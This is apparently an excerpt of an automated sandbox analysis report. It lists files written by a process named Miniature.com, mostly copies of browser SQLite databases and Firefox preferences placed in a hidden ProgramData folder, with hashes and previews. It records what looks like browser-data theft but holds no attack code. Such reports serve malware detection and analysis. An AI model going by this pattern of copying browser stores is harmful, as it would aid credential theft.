                                                                                                                                                                                                                                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\C2VKNO8Q1DJM\A1NG4W

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9370
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.514140640374404
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                                                                                                                                                                                          MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                                                                                                                                                                                          SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                                                                                                                                                                                          SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                                                                                                                                                                                          SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                          C:\ProgramData\C2VKNO8Q1DJM\L6XTRI

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\C2VKNO8Q1DJM\US0HLX

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):294912
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08441928760034874
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vI:51zkVmvQhyn+Zoz67V
                                                                                                                                                                                                                                                                                          MD5:2ABDC5DBC05C0C5CE5E1EB6D6E8C1B0D
                                                                                                                                                                                                                                                                                          SHA1:14DFBE9B28D033542357D98005239D842A16FCFD
                                                                                                                                                                                                                                                                                          SHA-256:91F1008439BD28B09EC1FC851F2679DFBAA45B27409882AD899CEF8460A036AF
                                                                                                                                                                                                                                                                                          SHA-512:DD4BD1407DFDC90BC97F5940A120CCDE7D4A6DAA3E0DB1649BED96EBE52FFDF879E52E028657F954FF39A93EEE8F57694A7EAC55D85CA57AF2BBD7A7793B9030
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\C2VKNO8Q1DJM\VKNG4E3OZ

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\C2VKNO8Q1DJM\VS0RQIWB1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\C2VKNO8Q1DJM\WBI5PP

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\C2VKNO8Q1DJM\XTJEKX

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2651716274333387
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:KrJ/2qOB1nxCkMPSAELyKOMq+8HKkjucswRv8p3nVumH:K0q+n0JP9ELyKOMq+8HKkjuczRv89D
                                                                                                                                                                                                                                                                                          MD5:6F09A60146E610ADC2B476E720AD813E
                                                                                                                                                                                                                                                                                          SHA1:9F436B059B4DA13F94996B64B7EB688C55BC792A
                                                                                                                                                                                                                                                                                          SHA-256:5BAB95E2F29E66C62D9254172AE0F5ED4AAC9C5C0134648992932FEBCC86BEE7
                                                                                                                                                                                                                                                                                          SHA-512:5F68D788E50EC9C7F588C3A2EAD97C8AB64EA1B0CAD1A51147651A02C608865B081F4584004C8FEAE37F06611E116C3690343BF74E1C92043420A0003BBA576D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2cbab827-9ad8-45bb-a352-362efcffe180.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58627
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.100813157548634
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:qMk1rT8H1a+JPGWv/sxtwa1FFoT7VLyMV/Yosh:qMYrT8VPxv/4KwsVeZosh
                                                                                                                                                                                                                                                                                          MD5:EB53656F15A7BF4BCFA2F09B0BC99526
                                                                                                                                                                                                                                                                                          SHA1:6C369E0B3D786988A2607D015D4FDFB55207B13E
                                                                                                                                                                                                                                                                                          SHA-256:6338648EEE5F1CA330ACE75668C2FBCFA889A85CCEE78537DD6FB611D485AEA1
                                                                                                                                                                                                                                                                                          SHA-512:BE9C60F068AB934D003D157CDEB70DB51421B9F98DA6E02C1CC25A36C8CAB5BB78C58253925EC4A1D42F4DE977B5EFF7A7C57CA6518123972D7C562E7F1C22B4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"e826bae4-6872-4f07-bd22-d5abb804e7f0"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2cd8fab6-4925-4b7f-917c-d7865643b330.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):56066
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103039480185279
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynQPGWv/sxtw57VLyMV/YoskFoz:z/0+zI7yn0v/4KxVeZoskG
                                                                                                                                                                                                                                                                                          MD5:B38E93994A4E2C75078628A7A680A657
                                                                                                                                                                                                                                                                                          SHA1:1C2B8C37FE8B8036FEFA863DD15CC9440FC338DC
                                                                                                                                                                                                                                                                                          SHA-256:F3402F2A8B99B50129B48877CC53BB0E9253B9603975D056B23E8F0710D4C569
                                                                                                                                                                                                                                                                                          SHA-512:4EB38CCF7F086C1446B520B036974C5B05DECE1AD648D2C6A913DD8AE0C7F0E7C0703493ED2715FA5A1D6FE71013B3B91FB68C9DEAA9C772CD86D8422E690D7E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3667bed2-c86f-49ee-8a1f-2f07b99fc62e.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):57639
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103863469391794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynv0PGWv/sxtw8j7VLyMV/YoskFoz:z/0+zI7ynvAv/4KeVeZoskG
                                                                                                                                                                                                                                                                                          MD5:21966544EA39ECE0EF894DABD250021A
                                                                                                                                                                                                                                                                                          SHA1:B242191EE85E7504818F5CFD38D32C50E3797F13
                                                                                                                                                                                                                                                                                          SHA-256:190CEE62F4EDDA4D6B9B977D8EAAC00AAA09FECFAF08E7323D81152708F4F23A
                                                                                                                                                                                                                                                                                          SHA-512:E17D3C20AA3A771766295ECC1B26FDCA41572CA1A492A830F201FDC340FC763264F1679803FA8B3C3E75CA2FA6C0AB0A3A628F8C8D5D09E7E01141A6359E87BE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\42278dfd-4c55-47d5-a43f-8a7dce48e087.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):57717
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.10405345468604
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7yOjJPGWv/sxtwaj7VLyMV/YoskFoz:z/0+zI7yOjxv/4KsVeZoskG
                                                                                                                                                                                                                                                                                          MD5:3B5BE950D94C8AEE338170ECF8FED645
                                                                                                                                                                                                                                                                                          SHA1:BEB3CC5DEF657D40239453392C0006CF3070162D
                                                                                                                                                                                                                                                                                          SHA-256:B5613AA16A0B30F98E626D4A05D168B9A9E968B6AE730A871B6B168261345763
                                                                                                                                                                                                                                                                                          SHA-512:5A1672637238CFB18A78AE80F8A0F794A55C314462AA3805DA86127658E03F1FAC1168ED28C88FFFE3112757A98755F4E003EDE9DA7CEEF8D67F6AA5CE87D85F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\78338b1a-0982-4c37-8134-2ef22be27220.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58674
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.10063516034679
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:qMk1rT8H1aCJPGWv/sxtwa1FFoT7VLyMV/Yosh:qMYrT8Vtxv/4KwsVeZosh
                                                                                                                                                                                                                                                                                          MD5:65EF0FCEDC2AD184D9B6FF95EBC256CD
                                                                                                                                                                                                                                                                                          SHA1:4AE41DFF035EC55102BDC3B5FE9D6D781E766504
                                                                                                                                                                                                                                                                                          SHA-256:F8BAD3F3A59705125612C20F1BC65C048067F3A8945350B45FE9D4835D4E393E
                                                                                                                                                                                                                                                                                          SHA-512:1922F5ED6C06EE69EDD5557FD09C4F1F1D52C0482CCD6EFE4BE9D00B1539F05F15958C66642A3DFF85D3C1018C08BF17BF5C3A0BC7C5BA603DF286B64FA904DD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"e826bae4-6872-4f07-bd22-d5abb804e7f0"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7abd416b-08b5-4ec7-a86f-7b359d229c61.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58751
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.100739857014497
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:qMk1rT8HfaCqMPGWv/sxtwa1FFoT7VLyMV/Yosh:qMYrT8/tDv/4KwsVeZosh
                                                                                                                                                                                                                                                                                          MD5:90E83C65EEB88B34130915A45D579CDA
                                                                                                                                                                                                                                                                                          SHA1:777C7251B68D33032924951B31AB1D3D7444F759
                                                                                                                                                                                                                                                                                          SHA-256:CB828DB4F9271974DB3E717ECA536BF519C62C745615C1480F3C4B2A19763623
                                                                                                                                                                                                                                                                                          SHA-512:0E3365B008A18C8BCA16CC4E64E96507B8D34A18350587F6330990649D17C2B74F0B0281B36FACE3FC8A4AED00F046125FE6F45864F937771D2186166A02F98F
                                                                                                                                                                                                                                                                                          Malicious:false
